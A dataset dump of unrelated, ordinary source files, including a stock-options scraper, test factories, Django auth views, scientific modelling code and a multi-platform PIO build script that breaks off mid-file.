pd.DataFrame:\n \"\"\"Scrape barchart for options info\n\n Parameters\n ----------\n ticker: str\n Stock ticker\n\n Returns\n -------\n df: pd.DataFrame\n Dataframe of information\n \"\"\"\n page = f\"https://www.barchart.com/stocks/quotes/{ticker}/overview\"\n\n r = requests.get(page, headers={\"User-Agent\": \"Mozilla/5.0\"})\n soup = BeautifulSoup(r.text, \"html.parser\")\n tags = soup.find(\n \"div\",\n attrs={\n \"class\": \"barchart-content-block symbol-fundamentals bc-cot-table-wrapper\"\n },\n )\n data = tags.find_all(\"li\")\n labels = []\n values = []\n for row in data:\n labels.append(row.find_all(\"span\")[0].getText())\n values.append(row.find_all(\"span\")[1].getText())\n\n df = pd.DataFrame(data=[labels, values]).T\n\n return df\n","sub_path":"gamestonk_terminal/options/barchart_model.py","file_name":"barchart_model.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137267517","text":"# -*- coding: utf-8 -*-\nimport factory\nfrom factory.django import DjangoModelFactory\nfrom osf_tests.factories import UserFactory, ProjectFactory, ExternalAccountFactory\n\nfrom addons.nextcloud.models import UserSettings, NodeSettings\n\n\nclass NextcloudAccountFactory(ExternalAccountFactory):\n provider = 'nextcloud'\n provider_id = factory.Sequence(lambda n: 'id-{0}'.format(n))\n profile_url = factory.Sequence(lambda n: 'https://localhost/{0}/nextcloud'.format(n))\n oauth_secret = factory.Sequence(lambda n: 'https://localhost/{0}/nextcloud'.format(n))\n display_name = 'catname'\n oauth_key = 'meoword'\n\n\nclass NextcloudUserSettingsFactory(DjangoModelFactory):\n class Meta:\n model = UserSettings\n\n owner = factory.SubFactory(UserFactory)\n\n\nclass NextcloudNodeSettingsFactory(DjangoModelFactory):\n class Meta:\n model = NodeSettings\n\n owner = factory.SubFactory(ProjectFactory)\n user_settings = factory.SubFactory(NextcloudUserSettingsFactory)\n folder_id = '/Documents/'\n","sub_path":"addons/nextcloud/tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"605321237","text":"#\n# for i in iter(int, 1):\n# print(\"dsdsd\")\n\n# s = [1,2,4,5,1,2,5]\n# c = [1,2,4,5,1,2,5]\n# z = len(s)\n# v = len(c)\n# if z == v:\n# for i in range(z) :\n# if s[i] != c[i]:\n# print(\"не равны\")\n# break\n# else:\n# print(\"не равны\")\n\nс = \"five thirteen two eleven seventeen two one thirteen ten four eight five nineteen\"\nc = с.split(\" \")\n\n# dic = {\"five\": 5, \"thirteen\": 13, \"two\": 2, \"eleven\": 11, 'seventeen': 17, 'one': 1,\n# \"ten\": 10, \"four\": 4,\"eight\":8, \"nineteen\": 19}\n\nf = []\nfor i in list(range(len(c))):\n f.append({\"five\": 5, \"thirteen\": 13, \"two\": 2, \"eleven\": 11, 'seventeen': 17, 'one': 1,\"ten\": 10, \"four\": 4,\"eight\":8, \"nineteen\": 19}[c[i]])\nprint(f)\n\nli = list(set(f))\nprint(li)\n\nfor i in range(len(li)):\n if i == int(len(li)-1): break\n if li[i] % 2 != 0: print(\"ggg\", li[i] + li[i + 1])\n if li[i] % 2 == 0: print(\"ggg\", li[i] * li[i + 1])\n\nsum = 0\nfor i in range(len(li)):\n if li[i] % 2 != 0:\n sum = sum + li[i]\n\nprint(\"Сумма нечетных\", sum)\n","sub_path":"Tasks/Putsilouski_Tasks/CW/6/claswork2.py","file_name":"claswork2.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"82142901","text":"import os\nimport os.path as osp\nimport re\n\n\nbase_path = 'papers/'\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n \ndef human_sort_keys(text):\n \"\"\"\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n \"\"\"\n return [ atoi(c) for c in re.split('(\\d+)', text) ]\n\ndef pretty_print_areas(areas):\n for k in areas.keys():\n print(\"{0}\\t\\t{1}\".format(k, areas[k]))\n\nareas = {}\n\nfor root, dirs, files in os.walk(base_path):\n # Get all the subdirectories in the base_path as the different areas\n if root == base_path:\n for area in dirs:\n areas[area] = []\n\n if files:\n area = root.split('/')[-1]\n for file in files:\n areas[area].append(osp.join(root, file))\n \n# pretty_print_areas(areas)\n\nfor k in areas.keys():\n areas[k].sort(key=human_sort_keys)\n print(\"## \" + k.title())\n for p in areas[k]:\n with open(p) as f:\n title = f.readline()[3:].strip()\n paper_no = p.split('/')[-1][:-3]\n print(\"{2}. [{0}]({1})\".format(title, p, paper_no))\n \n print()\n","sub_path":"papers_list.py","file_name":"papers_list.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"520986320","text":"import logging\nimport os\nimport sys\nimport requests\nfrom keboola.docker import Config\nimport exdbm.extractor\nimport voluptuous as vp\n\nif __name__ == '__main__':\n try:\n datadir = os.environ['KBC_DATADIR']\n config = Config(datadir)\n params = config.get_parameters()\n if params.get('debug'):\n logging.basicConfig(level=logging.DEBUG, stream=sys.stdout)\n else:\n logging.basicConfig(level=logging.INFO, stream=sys.stdout)\n\n credentials = {\n 'client_id': config.get_oauthapi_appkey(),\n 'client_secret': config.get_oauthapi_appsecret(),\n 'refresh_token': config.get_oauthapi_data()['refresh_token']\n }\n exdbm.extractor.main(datadir, credentials, params)\n except (ValueError, KeyError, vp.MultipleInvalid):\n logging.error(err)\n sys.exit(1)\n except requests.HTTPError as err:\n logging.error(\"%s %s\", err, err.response.text)\n sys.exit(1)\n except:\n logging.exception(\"Internal error\")\n sys.exit(2)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454874590","text":"# coding: utf-8\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport json\n\nfrom django.conf import settings\nfrom django.contrib import auth\nfrom django.http import HttpResponse, HttpResponseNotAllowed\nfrom django.shortcuts import render, redirect\n# import requests\n\n# from .models import UserProfile\nfrom .auth import authenticate_dibbs\n\n\ndef _user_request_data(request):\n return HttpResponse(json.dumps({\n 'user': str(request.user),\n 'is_anonymous': bool(request.user.is_anonymous()),\n 'is_active': bool(request.user.is_active),\n 'is_authenticated': bool(request.user.is_authenticated()),\n }, indent=4), content_type='application/json')\n\n\ndef login(request):\n if request.method == 'GET':\n return render(request, 'userproxy/login.html')\n elif request.method != 'POST':\n raise HttpResponseNotAllowed()\n\n auth.logout(request)\n user = authenticate_dibbs(\n username=request.POST['username'],\n password=request.POST['password'],\n )\n if user is not None:\n if user.is_active:\n auth.login(request, user)\n return redirect('home')\n\n return render(request, 'userproxy/login.html', context={\n 'error': 'Invalid credentials.',\n })\n\n\ndef logout(request):\n auth.logout(request)\n return HttpResponse('200 OK')\n\n\ndef home(request):\n return _user_request_data(request)\n","sub_path":"repos/backtofront/userproxy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"3828978","text":"import xarray as xr\nimport numpy as np\nimport netCDF4\nfrom datetime import timedelta\n\nde = xr.open_dataset(\"/g/data/x77/ahg157/inputs/mom6/panan/vcoord.nc\")\ndi = xr.open_dataset(\n \"/data/panan/temp_salt_init_z_0025.nc\",\n chunks={\"depth\": 11, \"nyp\": 169, \"nxp\": 360}\n)\ndf = xr.open_dataset(\"/g/data/x77/ahg157/inputs/mom6/panan/forcing_obc_converted.nc\")\ndg = xr.open_dataset(\"/g/data/x77/ahg157/inputs/mom6//panan/ocean_hgrid_0025.nc\")\n\nvelocity_timescale = timedelta(days=1).total_seconds()\n\nc2d = (169, 360)\nc3d = (11, 169, 360)\n\nkwargs = {\n \"zlib\": True,\n \"chunksizes\": c3d,\n \"fill_value\": netCDF4.default_fillvals[\"f8\"],\n}\n\ndo = netCDF4.Dataset(\"/g/data/x77/ahg157/inputs/mom6/panan/sponge_idamp_velonly.nc\", \"w\")\ndo.createDimension(\"nxp\", 7200)\ndo.createDimension(\"nyp\", 1690)\ndo.createDimension(\"zl\", 75)\ndo.createDimension(\"zi\", 76)\n\ndo.createVariable(\"Idamp\", \"f8\", (\"nyp\", \"nxp\"), zlib=True, chunksizes=c2d, fill_value=netCDF4.default_fillvals[\"f8\"])[:] = 0\ndo.variables[\"Idamp\"][:] = (1 / 3600) * (dg.y.isel(nyp=slice(1, None, 2), nxp=slice(1, None, 2)) > -38)\n\n# h = df.dz_u_segment_001.isel(time=0, ny_segment_001=0, nx_segment_001=slice(1, None, 2))\n# do.createVariable(\"uv_thickness\", \"f8\", (\"zl\", \"nyp\", \"nxp\"), **kwargs)\n# do.variables[\"uv_thickness\"][:] = h.values[:,None,:]\n\ndo.close()\n","sub_path":"scripts/generate_idamp_netcdf4.py","file_name":"generate_idamp_netcdf4.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"504211367","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\n\nfrom thrift.py3lite.serializer import Protocol\nfrom thrift.py3lite.sync_client import ClientType, get_client\nfrom thrift.py3lite.test.lite_clients import TestService\nfrom thrift.py3lite.test.lite_types import ArithmeticException, EmptyException\nfrom thrift.py3lite.test.test_server import server_in_another_process\n\n\nclass SyncClientTests(unittest.TestCase):\n def test_basic(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertEqual(3, client.add(1, 2))\n\n def test_client_type_and_protocol(self) -> None:\n with server_in_another_process() as path:\n with get_client(\n TestService,\n path=path,\n client_type=ClientType.THRIFT_ROCKET_CLIENT_TYPE,\n protocol=Protocol.BINARY,\n ) as client:\n sum = client.add(1, 2)\n self.assertEqual(3, sum)\n\n def test_void_return(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertIsNone(client.noop())\n\n def test_exception(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertAlmostEqual(2, client.divide(6, 3))\n with self.assertRaises(ArithmeticException):\n client.divide(1, 0)\n\n def test_void_return_with_exception(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n with self.assertRaises(EmptyException):\n client.oops()\n\n def test_oneway(self) -> None:\n with server_in_another_process() as path:\n with get_client(TestService, path=path) as client:\n self.assertIsNone(client.oneway())\n","sub_path":"thrift/lib/py3lite/client/test/sync_client_test.py","file_name":"sync_client_test.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"476272485","text":"import spisok_stud, quashion\n# Начало работы\n# Вызываем все функции из модулей spisok_stud, quashion для прохождения теста\ndef callback():\n stud = spisok_stud.reg()\n avtoriz = spisok_stud.log()\n test = quashion.test_matematik()\n ser = quashion.serialize()\n sav = quashion.user_json_dumps()\n return sav\n# Вывод данных в файл c использованием json.loads и добавления к этим данным фамилии и имени студента\nimport json\ndef test_stud_for_arhiv():\n c = str(input(\"Введите свою Фамилию: \"))\n i = str(input(\"Введите свое Имя: \"))\n list_stud = [c, i]\n total_data = {\"Данные тестируемого\": list_stud}\n fil = str(input(\"Введите с клавиатуры имя файла , откуда нужно взять данные теста студента \"))\n data_stud = {}\n with open(fil, \"r\") as f:\n json_loads_d = f.read()\n data_stud = json.loads(json_loads_d)\n data_stud.update(total_data)\n print(type(data_stud))\n print(data_stud)\n return data_stud\nf = test_stud_for_arhiv()\n# Функция сохранения данных в формате json в файл 'архив'\ndef user_json_dumps(f):\n json_dumps_user = json.dumps(f)\n with open('архив', 'a') as f:\n f.write(json_dumps_user)\n print(json_dumps_user)\nuser_json_dumps(f)\n# Функция сериализации данных словаря в строку для удобного просмотра на экране\ndef serialize(f):\n res = \"Данные тестируемого: {}\\n\"\\\n \"Вопрос 2x2=?' : {}\\n\"\\\n \"Вопрос 3x3=? : {}\\n\" \\\n \"Вопрос 23-15=? : {}\\n\" \\\n \"Вопрос sin(180)=?: {}\\n\" \\\n \"Вопрос 120:5=? : {}\\n\"\\\n \"Вопрос 45x4=? : {}\\n\"\\\n \"Вопрос cos(90)=? : {}\\n\"\\\n \"Общее количество баллов: {}\".format(f[\"Данные тестируемого\"],\n f[\"Вопрос 2x2=?\"],\n f[\"Вопрос 3x3=?\"],\n f[\"Вопрос 23-15=?\"],\n f[\"Вопрос sin(180)=?\"],\n f[\"Вопрос 120:5=?\"],\n f[\"Вопрос 45x4=?\"],\n f[\"Вопрос cos(90)=?\"],\n f[\"Общее количество баллов\"])\n return res\nser_stud = serialize(f)\nprint(ser_stud)\n\n","sub_path":"res_test.py","file_name":"res_test.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"41657878","text":"from app import create_app, db\nfrom flask_script import Manager, Server\nfrom flask_migrate import Migrate, MigrateCommand\nfrom app.models import User\n#import migrations ,set up migrations\n\n#Creating an app instance\napp = create_app('development')\n\n#Creating the manager instance\nmanager = Manager(app)\n\n#create migration instance below\nmanager.add_command('server', Server)\nmigrate = Migrate(app, db)\nmanager.add_command('db',MigrateCommand)\n\n@manager.command\ndef test():\n '''\n to run the unit tests\n '''\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)\n\n\n@manager.shell\ndef make_shell_context():\n return dict(app = app, db = db, User = User)\nif __name__ == '__main__':\n manager.run()\n\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"151021122","text":"\nfrom BMM.metadata import TC, Ring\n\nrun_report(__file__, text='miscellaneous metadata and the baseline')\n\nfirst_crystal = TC('XF:06BMA-OP{Mono:DCM-Crys:1}', name='first_crystal')\ncompton_shield = TC('XF:06BMA-OP{Mono:DCM-Crys:1-Ax:R}', name='compton_shield')\n\nring = Ring('SR', name='ring')\n\nsd.baseline = (xafs_linx, xafs_liny, xafs_pitch, xafs_wheel, xafs_ref, #xafs_roll, xafs_linxs, xafs_roth, xafs_rots,\n dm3_bct, dm3_foils, dm2_fs,\n dcm_x, dcm_pitch, dcm_roll,\n slits3.top, slits3.bottom, slits3.outboard, slits3.inboard, slits3.vsize, slits3.vcenter, slits3.hsize, slits3.hcenter, \n slits2.top, slits2.bottom, slits2.outboard, slits2.inboard, slits2.vsize, slits2.vcenter, slits2.hsize, slits2.hcenter,\n #m1.yu, m1.ydo, m1.ydi, m1.xu, m1.xd, m1.vertical, m1.lateral, m1.pitch, m1.roll, m1.yaw,\n m2.yu, m2.ydo, m2.ydi, m2.xu, m2.xd, m2.vertical, m2.lateral, m2.pitch, m2.roll, m2.yaw, m2_bender,\n m3.yu, m3.ydo, m3.ydi, m3.xu, m3.xd, m3.vertical, m3.lateral, m3.pitch, m3.roll, m3.yaw,\n xafs_table.yu, xafs_table.ydo, xafs_table.ydi, xafs_xu , xafs_xd,\n xafs_table.vertical, xafs_table.pitch, xafs_table.roll, \n)\n\n#sd.baseline = ()\n","sub_path":"startup/16-metadata.py","file_name":"16-metadata.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"222501393","text":"from root.db import Database\nfrom .models import MovieModel\nfrom .movies_queries import *\n\n\nclass MovieGateway:\n def __init__(self):\n self.model = MovieModel\n self.db = Database()\n\n def add_movie(self, title, rating):\n self.db.create_connection()\n self.db.connect_cursor()\n\n query = '''\n INSERT INTO movies (title, rating)\n VALUES (?, ?);\n '''\n self.db.cursor.execute(query, (title, rating,))\n self.db.connection.commit()\n self.db.connection.close()\n\n self.db.create_connection()\n self.db.connect_cursor()\n get_movie_by_id_query = '''\n SELECT id\n FROM movies\n WHERE title = ? and rating = ?;'''\n\n self.db.cursor.execute(get_movie_by_id_query, (title, rating,))\n movie_id = self.db.cursor.fetchone()[0]\n\n self.db.connection.commit()\n self.db.connection.close()\n return self.model(movie_id=movie_id, title=title, rating=rating)\n\n def show_movies(self):\n self.db.create_connection()\n self.db.connect_cursor()\n\n self.db.cursor.execute(select_all_movies_and_order_by_rating)\n raw_movies = self.db.cursor.fetchall()\n\n self.db.connection.commit()\n self.db.connection.close()\n all_movies = []\n\n for movie in raw_movies:\n new_movie = self.model(movie_id=movie[0], title=movie[1], rating=movie[2])\n all_movies.append(new_movie)\n\n return raw_movies\n","sub_path":"root/movies/movies_gateway.py","file_name":"movies_gateway.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"340662238","text":"\"\"\"\nAuthor: Michael Markus Ackermann\n================================\nHere you will find everything related to the biot-allard model.\n\"\"\"\n\nimport numpy as np\nfrom scipy import special as ss\n\nformats = {\"circle\": 1,\n \"square\": 1.07,\n \"equi-tri\": 1.11,\n \"retang\": 0.81}\n\n\ndef shear_wave(omega, flow_resis, poros, tortu, shape, air_dens):\n \"\"\"\n Returns the Shear Wave number.\n\n Parameters:\n ----------\n omega: int | float | complex\n Angular frequency\n flow_ resis: int\n Resistivity of the material\n poros: float\n Porosity of the material\n tortu: float\n Tortuosity of the material\n shape: string\n Form factor for simple pores\n air_dens: int | float\n The air density\n\n Returns:\n --------\n s: int | float\n Shear wave number\n\n \"\"\"\n c1 = formats[shape]\n num = 8 * omega * air_dens * tortu\n den = flow_resis * poros\n s = c1 * (num / den) ** 0.5\n\n return s\n\n\ndef biot_allard(flow_resis, air_dens, poros, tortu, gama, prandtl,\n atm, shape, freq=np.arange(100, 10001, 1)):\n \"\"\"\n Returns through the Biot-Allard Model the Material Charactheristic\n Impedance and the Material Wave Number.\n\n Parameters:\n ----------\n flow_resis : int\n Resistivity of the material\n air_dens : int | float\n The air density\n poros : float\n Porosity of the material\n tortu: float\n Tortuosity of the material\n gama: int | float\n Ratio of specific heat\n prandtl: int | float\n Prandtl's number\n atm: int\n Atmospheric pressure\n shape: string\n Form factor for simple pores\n freq : ndarray\n A range of frequencies\n NOTE: default range goes from 100 [Hz] to 10 [kHz].\n\n Returns:\n -------\n zc : int | float | complex\n Material Charactheristic Impedance\n kc : int | float | complex\n Material Wave Number\n \"\"\"\n omega = 2 * np.pi * freq\n B = prandtl ** 0.5\n s = shear_wave(omega, flow_resis, poros, tortu, shape, air_dens)\n\n rho_part_a = air_dens * tortu\n rho_part_b = (flow_resis * poros) / (1j * omega * air_dens * tortu)\n rho_part_c = (s * (-1j) ** 0.5) / 4\n rho_part_d = 2 / (s * (-1j) ** 0.5)\n rho_part_e = ss.jv(1, s * (-1j) ** 0.5) / ss.jv(0, s * (-1j) ** 0.5)\n\n rho_ef = rho_part_a * (1 - rho_part_b * ((rho_part_c * rho_part_e) /\n (1 - rho_part_d * rho_part_e)))\n\n k_part_a = rho_part_b / B\n k_part_b = rho_part_c * B\n k_part_c = rho_part_d / B\n k_part_d = ss.jv(1, s * B * (-1j) ** 0.5) / ss.jv(0, s * B * (-1j) ** 0.5)\n\n k_ef = (gama * atm) / (gama - (gama - 1) /\n (1 - k_part_a * ((k_part_b * k_part_d) /\n (1 - k_part_c * k_part_d))))\n\n # Changing from efficient to equivalent\n rho_eq = rho_ef / poros\n k_eq = k_ef / poros\n\n # Charactheristic Impedance (zc) and the Wave Number (kc)\n zc = (k_eq * rho_eq) ** 0.5\n kc = omega * (rho_eq / k_eq) ** 0.5\n\n return zc, kc\n","sub_path":"pyabsorp/models/biot_allard.py","file_name":"biot_allard.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"397272900","text":"from __future__ import generators\nfrom __future__ import print_function\nimport abc\nimport os\nimport sys\nimport fileinput\n\n# imports of NCAR scripts\nlib_path = os.path.join('scripts/python/contrib/unit_testing')\nsys.path.append(lib_path)\nimport environment as lmod\nimport subprocess\nimport shutil\n\nclass platformBuilder(object):\n __metaclass__ = abc.ABCMeta\n \"\"\" class to extend for building on various platforms. implements\n interfaces and a factory pattern. creates a relevant platform\n class (darwin_gnu, yellowstone_intel, goldbach_nag, etc...\n that configures cmake, builds pio and tests, and runs the unit\n tests.\n \"\"\"\n\n def __init__(self, compiler,test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes. Override this in platform specific classes\n \"\"\"\n self.test = test\n self.CMAKE_EXE = ''\n if mpilib == 'mpi-serial':\n self.CC = 'cc'\n self.FC = 'f90'\n self.CXX=''\n else:\n self.FC = 'mpif90'\n self.CC = 'mpicc'\n self.CXX = 'mpiCC'\n\n self.LDFLAGS=''\n\n if debug is True:\n bldtype = \"PIO_DEBUG\"\n else:\n bldtype = \"PIO\"\n\n\n self.OFLAGS = ('-D CMAKE_BUILD_TYPE:STRING={0} '\n '-D PIO_BUILD_TESTS:LOGICAL=TRUE '\n '-D PIO_BUILD_TIMING:LOGICAL=TRUE '.format(bldtype))\n self.MPIEXEC = ''\n self.EXECCA = ''\n self.TEST_CMD = 'ctest '\n self.MAKE_CMD = 'make all'\n self.envMod = dict(os.environ)\n @classmethod\n def _raise_not_implemented(cls, method_name):\n raise NotImplementedError(cls.__name__ +\n \" does not implement method \" +\n method_name+\".\")\n\n @abc.abstractmethod\n def runModuleCmd(self, modname):\n \"\"\"Method not implemented.\"\"\"\n self._raise_not_implemented(\"runModuleCmd\")\n\n def metaBuild(self):\n \"\"\" routine where everything gets kicked off from\n \"\"\"\n shutil.rmtree(self.BUILD_DIR, True)\n\n self.runModuleCmd()\n # ~# change environment, first get existing env\n\n # ~# add to env- \n self.envMod['FC'] = self.FC\n self.envMod['CC'] = self.CC\n if not self.CXX == '':\n self.envMod['CXX'] = self.CXX\n if not self.LDFLAGS == '':\n self.envMod['LDFLAGS'] = self.LDFLAGS\n\n self.cmakeCmd()\n self.buildCmd()\n if self.test:\n self.testCmd()\n\n def buildCmd(self):\n \"\"\" run build\n \"\"\"\n p = subprocess.Popen(self.MAKE_CMD,shell=True,env=self.envMod)\n p.wait()\n\n def testCmd(self):\n \"\"\" run tests\n \"\"\"\n p = subprocess.Popen(self.TEST_CMD, shell=True, env=self.envMod)\n p.wait()\n\n def cmakeCmd(self):\n \"\"\" cmake command to run\n \"\"\"\n # ~# make build directory and move to it.\n if not os.path.exists(self.BUILD_DIR):\n os.makedirs(self.BUILD_DIR)\n\n os.chdir(self.BUILD_DIR)\n\n cmakeString = (self.CMAKE_EXE +' '+ self.OFLAGS + ' '+ self.EXECCA + ' '+self.MPIEXEC + ' ..')\n\n p = subprocess.Popen(cmakeString,\n shell=True, env=self.envMod)\n p.wait()\n\n @staticmethod\n def factory(platform,compiler,test,mpilib,debug):\n \"\"\" factory method for instantiating the appropriate class\n \"\"\"\n\n if platform == \"darwin\":\n return darwin(compiler,test,mpilib,debug)\n if platform == \"goldbach\":\n return goldbach(compiler,test,mpilib,debug)\n if platform == \"yellowstone\":\n return yellowstone(compiler,test,mpilib,debug)\n if platform == \"caldera\":\n return caldera(compiler,test,mpilib,debug)\n if platform == \"mira\":\n return cetus(compiler,test,mpilib,debug)\n if platform == \"cetus\":\n return cetus(compiler,test,mpilib,debug)\n# return platformBuilder(compiler)\n\n\n\"\"\" these subclasses should probably be in their own files.\n each platform then needs one class to extend testCmd and\n runModuleCmd. That in turn should be extended only for __init__\n for each compiler...all to reduce duplicated code.\n\"\"\"\n \nclass darwin(platformBuilder):\n\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(darwin,self).__init__(compiler, test,mpilib,debug)\n \n self.CMAKE_EXE = '/opt/local/bin/cmake'\n self.OFLAGS += ('-D PLATFORM:STRING=darwin ')\n if mpi is True:\n self.MPIEXEC = ('-D MPIEXEC:FILEPATH='\n '/opt/local/bin/mpiexec-mpich-gcc48 ')\n self.EXECCA = ''\n \n def runModuleCmd(self):\n \"\"\" implement ABC...give pass in this case...run module cmds\n \"\"\"\n # ~# not implemented for a system without lmod (or\n # ~# somthing similar)\n pass\n\nclass elm(darwin):\n\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(elm,self).__init__(compiler, test,mpilib,debug)\n\nclass cray(platformBuilder):\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n \n super(cray, self).__init__(compiler, test,mpilib, debug)\n \n self.BUILD_DIR = \"build_cray_\" + compiler\n self.OFLAGS += ( '-D CMAKE_SYSTEM_NAME:STRING=Catamount ')\n\n\nclass bluewaters(cray):\n\n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(bluewaters,self).__init__(compiler, test,mpilib,debug)\n if compiler == 'cray': \n self.moduleList = ['PrgEnv-cray/5.2.40','cce/8.3.8']\n if compiler == 'pgi':\n self.moduleList = ['PrgEnv-pgi/5.2.40','pgi/14.2.0']\n self.moduleList += ['cray-netcdf-hdf5parallel/4.3.2',\n 'cmake']\n\n\nclass goldbach(platformBuilder):\n \n def __init__(self, compiler, test,mpilib,debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n \n super(goldbach, self).__init__(compiler, test,mpilib, debug)\n if compiler == 'nag':\n self.moduleList = ['compiler/nag/5.3.1-907']\n if compiler == 'intel':\n self.moduleList = ['compiler/intel/14.0.2']\n\n self.BUILD_DIR = \"build_goldbach_\" + compiler\n self.runModuleCmd()\n \n self.CMAKE_EXE = '/usr/bin/cmake '\n \n self.OFLAGS += ( '-D PLATFORM:STRING=goldbach ')\n if mpilib is not \"mpi-serial\":\n self.MPIEXEC = ('mpirun ')\n self.EXECCA = ''\n self.LDFLAGS = '-lcurl'\n os.environ[\"MODULESHOME\"] = \"/usr/share/Modules\"\n os.environ[\"MODULEPATH\"]=\"/usr/share/Modules/modulefiles:/etc/modulefiles\"\n def runModuleCmd(self):\n \"\"\" implement ABC...run module cmds\n \"\"\"\n # ~# not implemented for a system without lmod (or\n # ~# somthing similar)\n self.lmod = lmod.ModuleInterface()\n self.lmod.python_init(\"/usr/share/Modules/init/python.py\")\n\n self.lmod.purge()\n\n for cmd in self.moduleList:\n self.lmod.load(cmd)\n self.lmod.list()\n \nclass yellowstone(platformBuilder):\n\n def __init__(self, compiler, test, mpilib, debug):\n \"\"\" user defined ctor so we can put stuff in a class instead of as\n class attributes\n \"\"\"\n super(yellowstone,self).__init__( compiler, test, mpilib,debug)\n os.environ[\"LMOD_DEFAULT_MODULEPATH\"]=\"/glade/apps/opt/modulefiles/ca/compilers:/glade/apps/opt/modulefiles/ca/idep\" \n\n self.moduleList = ['ncarenv/1.0 ',\n 'cmake ',\n 'python ',\n 'ncarbinlibs/1.1 ']\n if compiler == 'intel':\n self.moduleList += ['intel/15.0.1',\n 'ncarcompilers/1.0']\n if mpilib is not \"mpi-serial\":\n self.moduleList += ['netcdf-mpi/4.3.3-rc3']\n os.environ[\"PNETCDF\"]=\"/glade/u/home/jedwards/pnetcdf/svn2013/\"\n else:\n self.moduleList += ['netcdf/4.3.2']\n self.CC = 'icc'\n self.FC = 'ifort'\n\n if compiler == 'pgi':\n self.moduleList += ['pgi/14.10',\n 'netcdf/4.3.0',\n 'ncarcompilers/1.0']\n if mpilib is not \"mpi-serial\":\n os.environ[\"PNETCDF\"]=\"/glade/u/home/jedwards/pnetcdf/svn1920/pgi\"\n\n\n if compiler == 'gnu':\n self.moduleList += ['gnu/4.9.2',\n 'ncarcompilers/1.0',\n 'netcdf/4.3.0']\n if mpilib is not \"mpi-serial\":\n os.environ[\"PNETCDF\"]=\"/glade/u/home/jedwards/pnetcdf/svn1920/gnu\"\n\n if mpilib is not 'mpi-serial':\n# self.moduleList += ['pnetcdf/1.4.1']\n self.FC = 'mpif90'\n self.CXX = 'mpiCC'\n\n self.BUILD_DIR = \"build_yellowstone_\" + compiler\n# os.environ[\"LMOD_CMD\"]=\"/glade/apps/opt/lmod/lmod/libexec/lmod\"\n# os.environ[\"LMOD_DIR\"]=\"/glade/apps/opt/lmod/lmod/libexec/\"\n\n# for key in os.environ.keys():\n# print(\"%30s %s\\n\" % (key,os.environ[key]))\n\n\n\n self.runModuleCmd()\n\n self.CMAKE_EXE = 'cmake'\n\n self.NUMPE = '4'\n\n self.OFLAGS += ('-D PLATFORM:STRING=yellowstone ')\n\n self.MPIEXEC = (' -D MPIEXEC:FILEPATH=\"mpirun.lsf \" ')\n #self.TEST_CMD = ('execca ctest --verbose -D Experimental')\n self.TEST_CMD = ('execca ctest --verbose')\n \n def testCmd(self):\n \"\"\" override testCmd s.t. on yellowstone we open a caldera interactive\n node, run the tests (same as the base class)\n and then exit the queue.\n \"\"\"\n 